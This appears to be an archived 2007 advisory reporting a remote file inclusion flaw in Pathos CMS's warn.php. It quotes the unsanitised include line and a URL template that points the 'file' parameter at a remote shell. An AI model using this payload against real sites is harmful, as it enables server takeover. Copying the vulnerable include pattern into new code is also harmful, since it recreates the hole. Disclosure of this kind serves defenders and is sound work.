Pathos CMS 0.92-2 (warn.php file) Remote File Inclusion Vulnerability

2007-04-11T00:00:00
ID SECURITYVULNS:DOC:16664
Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00

Description

Pathos Content Management System


Found by kezzap66345 *



Script download:: http://sourceforge.net/projects/pathos/ Direct link : http://sourceforge.net/project/showfiles.php?group_id=103303&package_id=110862&release_id=243512



ERROR#1: File:warn.php


include_once($_GET['file'] . ".html"); <<< rfi coded


RFI#1:

http://SITE.com/path/warn.php?file=[SHELL]



Thanks:@--_| i!..:: S.H.i.K.a.A ::..!i *x0r0n*..:a.j.a.n..:*** ************ ************ ************ ************ **ThanxSiiRCiCOCUK*str0ke*******

milw0rm.com [2007-04-09]